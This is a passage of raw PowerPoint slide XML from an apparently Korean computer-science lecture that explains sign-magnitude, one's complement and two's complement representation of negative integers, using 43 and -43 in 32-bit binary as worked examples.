              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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ko-KR" altLang="en-US" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>음수의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826B7014-706F-478B-BB67-E7683A3B69D9}"/>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9362BA0D-BA67-401F-8DD8-CDF862335C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32DBD6-A197-4BF9-AAF0-7E2900F376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3" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECECDD85-EE55-4703-B344-0179E4820A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E5B4BAE3-40C9-4846-B7F8-9666CFA1A6CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1531089" y="2721934"/>
            <a:ext cx="9179442" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0"/>
              <a:t>43 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>000 0000 0000 0000 0000 0000 0010 1011(2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42F7DA70-2E62-4879-A1EA-DA708E1AA5E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1261731" y="3245154"/>
            <a:ext cx="9179442" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0"/>
              <a:t>- 43 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>??????????????????????????????????????????</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0"/>
              <a:t>(2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C426D79A-3192-4FC3-A564-04F86F6FF879}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2523460" y="4538010"/>
            <a:ext cx="6487633" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>음수를 표현하는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Policy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>를 만들어보자</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="557161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ko-KR" altLang="en-US" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>음수의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CB54960C-7D59-4DF8-A4C3-A966721F309B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249136" y="1804648"/>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(1's Complement)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="직사각형 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B040E3F-51C0-422F-9088-E1B838B27BA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3559628" y="1804648"/>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양수값의 비트를 반전시켜서 음수를 표현하는 방법</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>을 음수화 시켰을 때 다른 표현방법이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>됀다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="직사각형 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3ECEBC9-3A50-420B-BD02-2DBA700B9CC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249136" y="2759869"/>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2</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(2's Complement)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="직사각형 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D73E256F-6CB8-459D-878E-A295063E0F62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3559628" y="2759869"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>보수값에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>을 한 값</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="직사각형 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48C8D56D-230F-40EA-A04C-28B23E7064C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249136" y="4670311"/>
            <a:ext cx="8972550" cy="16651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rPr>
              <a:t>     0000 0000 0000 0000 0000 0000 0010 1011(2) // 43(10)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     1111 1111 1111 1111 1111 1111 1101 0100(2) // 43(10) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>의 보수</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     1111 1111 1111 1111 1111 1111 1101 0101(2) // 43(10) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>의 보수</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(-1) 0000 0000 0000 0000 0000 0000 0010 1011(2) // 43(10) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>의 부호 절대값 반전</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="직사각형 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22997E6C-C8F3-4473-B7EA-269FBC1EA1A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249136" y="3715090"/>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부호 절대값 방법</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Sign Magnitude)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="직사각형 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7F77167-DC3C-49B7-84D3-25057D71747E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3559628" y="3715090"/>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부호 비트를 제외한 수를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>양수값으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 읽고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>부호비트에 따라 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+ - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 인식하는 방법</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="그룹 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{826B7014-706F-478B-BB67-E7683A3B69D9}"/>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9362BA0D-BA67-401F-8DD8-CDF862335C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32DBD6-A197-4BF9-AAF0-7E2900F376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3" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECECDD85-EE55-4703-B344-0179E4820A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6523770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음수의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초의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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>의 보수</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>, 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>의 보수를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Math.pow</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a,b</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 a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>b </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>승을 출력한다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보수를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 변수 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2" name="그룹 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B6EABB5-1EF8-4076-B900-6EC64B8E2888}"/>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4088AD8F-FA1C-4FAA-AB0D-EEDC4542428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02339D5-014B-40FD-8C24-24AE218D00A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E3E47A9-9E7E-4990-A24C-CE09518D1F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9780103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time </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>변수를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>65450682, M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>변수를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>2^31 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 두고 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>M-time </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>진수로 구한다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보수가 맞는지 확인</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"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39A86EE0-76A7-48AB-B307-648B73AE67B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="527146" y="792645"/>
            <a:ext cx="5150085" cy="1940858"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C23D91C-9582-4204-9C4D-4FDD6D82F831}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2870421" y="2331720"/>
            <a:ext cx="890546" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>의 보수</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F093247E-1F27-4421-A858-DCD3E8F62AAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2870421" y="1977543"/>
            <a:ext cx="890546" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>의 보수</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="그림 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4197D552-4714-42EC-9CD5-370F665058D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="3618363"/>
            <a:ext cx="5066140" cy="857975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="그룹 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BA25161-25E2-4B10-8D04-EAB6AA07539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F8E1418B-BAE6-4FA1-A38A-D8AF846B9F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D523DE7-0F6E-43B9-B38E-79FFED7DEE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378ACF6A-56D6-452F-97C8-887339BA3C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812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부동 소수점(Floating Point)란 무엇인가?">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
